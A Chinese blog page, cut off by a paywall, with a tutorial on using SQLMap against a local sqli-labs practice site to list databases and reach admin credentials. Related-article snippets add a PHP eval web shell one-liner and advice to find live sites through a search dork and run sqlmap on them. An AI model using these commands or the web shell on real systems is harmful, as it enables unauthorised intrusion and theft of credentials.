【WEB安全】SQLMAP获取后台账号密码

最新推荐文章于 2022-05-26 11:25:44 发布
最新推荐文章于 2022-05-26 11:25:44 发布
阅读量1.5k 收藏 8
点赞数
分类专栏: web渗透 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yijinbaiyi/article/details/104062436
版权

SQLMAP获取后台账号密码

一. SQLmap

SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。

二. 常见注入类型

ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入

ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延迟语句是否已执行(页面返回时间的增加)来判断

ü 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中

ü 联合查询注入,在可以使用Union的情况下的注入

ü 堆查询注入,可以使用多条执行语句时的注入

三. 所用环境及工具

ü Python 2.7.8

ü SQLMap 1.4

ü Sqlilabs

四. 步骤

  1. 安装SQLMap需要安装python环境(不支持python3),实验中使用到的环境是python 2.7.8。

  2. 把SQLMap安装包放入python的安装目录下面,进入到SQLMap的目录。

  3. 判断目标URL是否存在注入点。检测出注入点,便进一步查询数据库。

  4. 查询当前用户下的所有数据库名称 sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” --dbs

  5. 查询当前使用的数据库 sqlmap.py -u “http://127.0.0.1/sqli-labs-master/Less-1/?id=1” --current-db 获取当前数据库的名称

最低0.47元/天 解锁文章
yijin-南渊
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网站后台用户名+密码,FTP空间
11-14
网站后台用户名+密码,FTP空间。 在IE网址中直接输入“网站(ftp)”,根据提示直接输入户名名及密码即可入此网站的后台FTP空间。
Web渗透之Web利器合集——sqlmap使用手册
Mr_Wanderer的博客
07-21 660
文章目录1.获取数据指令2.指定注入类型3.辅助功能参数4.数据库相关指令5.web指纹和waf识别6.指定脚本7.shell权限--os-shell系统要求:使用--os-shell之后会生成两个文件--os-cmd=--sql-shell8.读取服务器指定文件9.更新 1.获取数据指令 -u指定注入点url -r 指定文件 –dbs跑库名 -D指定数据库 –tables跑表名 -T指定表 –columns跑字段 -C指定字段 –dump跑数据[敏感指令] –count查看数据量 2.指定注入类型 co
sqlmap --os-shell php文件密码在哪解决方法
身高两米不到的博客
05-26 645
0x00 开篇 今日搭建s-cms复现漏洞,发现该站存在注入,使用os-shell可以直接获得权限,但因一时间忘记sqlmap自动写入的php文件是啥玩意,于是记录一下。 0x01 方法一 自己echo写webshell 忘记php密码,自己echo写webshell,但需要知道该网站路径,以及要求路径有写入权限。 echo '<?php eval($_POST['1']);?>' >/路径/1.php 假如因关键字符被转义、屏蔽导致失败,也可以base64加密 echo 'PD
利用sqlmap获取网站帐号密码
weixin_66945507的博客
04-27 4713
利用sqlmap获取网站后台帐号密码
sqlmap注入后,获取到的数据库、表很多,如何快速找到账号和密码的位置
看不尽的尘埃——博客
02-07 7301
-D 数据库–-search -C admin,password  
Web应用安全Sqlmap操作参数介绍.pptx
06-19
Sqlmap操作参数介绍 1 Sqlmap简介 2 Sqlmap的安装 3 Sqlmap操作参数介绍 目录 Sqlmap简介 Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。 它拥有非常强大的检测引擎、...
Web应用安全Sqlmap用法介绍.pptx
06-20
Sqlmap用法介绍 搭建phpStudy站点 ...DVWA(Damn Vulnerable Web Application)是一个用来安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者
Sqlmap获取用户名与服务器.docx
04-14
Sqlmap 是一款功能强大且功能多样的渗透测试工具,特别是在数据库安全测试方面。通过 Sqlmap,我们可以轻松地检测数据库系统的漏洞,从而获取数据库用户名和密码。 Sqlmap 工具的使用非常广泛,特别是在渗透测试和...
SQLMap完成安全测试
03-03
sqlmap是一个开源的渗透测试工具,它可以自动化检测和利用SQL注入漏洞并接管数据库服务器。它有一个强大的检测引擎,许多适合于终极渗透测试的良好特性和众多的操作选项,从数据库指纹、数据获取到访问底层文件系统...
Web应用安全Sqlmap用法介绍(实验).docx
06-20
Sqlmap 用法介绍 一、实验目的 掌握Sqlmap的相关知识; 熟悉Sqlmap工具的使用; 掌握SQL注入的相关知识; 熟悉Web站点的搭建。 二、实验内容 安装Sqlmap; 搭建phpStudy站点并开启apache服务器和MySQL数据库; 在...
SQLMAP获取后台账号密码
weixin_45983744的博客
01-16 5574
QQ交流学习群:811401950 一. SQLmap SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。 二. 常见注入类型 ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入 ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延...
sqlmap+nikto行渗透测试获取管理员账号密码操作实例
WEL测试
10-18 8890
首先,在百度搜索输入框输入:inurl:asp?id=,在搜索列表中选择连接类似如下的url:http://域名/about.asp?id=325。 其次,打开BT5,打开sqlmap,执行如下格式命令:./sqlmap.py -u "http://域名/about.asp?id=325" --dbs --current-user,执行命令如下截图: 该命令是获取web服务操作系统、w
CTF之利用sqlmap获取后台数据
小伟锅的博客
08-26 6664
在攻防阶段利用kali系统中的owasp zap和sqlmap工具配合使用获取网站后台数据库中数据,在攻防阶段有可能在网站数据库表中有一条数据是flag{},即数据表中有flag记录;但在挑战赛阶段若为kali环境下的挑战题目可以利用sqlmap工具实现sql注入,从而获取后台管理员登陆用户名及密码(当然也可以利用burpsuite做代理实现暴力破解获得用户名和密码,但暴力破解需要合适的字典 由于
sqlmap 获取mysql密码_利用sqlmap 获取管理员账号密码
weixin_36400512的博客
02-06 2687
首先,先简单介绍下sqlmap简介:sqlmap是一种开源的支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。sqlmap支持五种不同的注入模式:UNION query SQL injection(可联合查询...
shop靶机实践sql盲注获取后台管理员账号密码
过客璇璇的博客
03-15 3697
shop靶机盲注获取后台管理员账号密码 找到注入点。 注入点:http://192.168.244.131:60785/shop/productshopxp.asp?id=485 首先分析一下为什么确定这是一个注入点: 一、 正常页面如下: 二、 在URL后加’即http://192.168.244.131:60785/shop/productshopxp.asp?id=485...
获取网站管理员账户密码?
热门推荐
Mike_Roger的博客
01-24 2万+
最近学长让用sqlmap获取一个网站的管理员账户和密码,一开始就很迷茫啊,毕竟对这些东西不是太了解,,可能是我懂得太少,,后来完成之后才发现是一件很简单的事,毕竟,学长给的是一个容易攻破的网站,,也不算是攻破,总之就是入门嘛。   SQL注入:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。   首先sqlmap据说是一个开源的
web小白,实战操作拿到网站后台账户和密码
frutrue的博客
10-09 7756
话不多说,直接上赶货,前几天遇到一个网站,就想着怎么拿到他的后台权限 首先我想的是去查看一下他的网站框架是什么,先随便构造个报错,看能不能有什么提示? 我们可以从报错信息中看到一些信息,可以看到网站报错信息,知道了这个网站的框架是thinkphp,而且是thinkphp3.2.3版本的,那样就好办很多了,我们去git上面找可以扫描这个容器漏洞的工具(这里推荐TPscan) (此图省略,因为原先的图片丢失了哈哈哈) 扫描后我们知道了,该网站的容器上存在thinkphp日志泄露...
sqlmap获取数据库账号密码
最新发布
09-19
4. 获取账号密码:在确认漏洞可利用后,sqlmap 将根据所选的注入技术,尝试提取数据库的账号和密码信息。它可以通过读取数据库的配置文件、绕过验证或爆破等方式获取凭据。 需要注意的是,sqlmap 的使用必须遵守...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值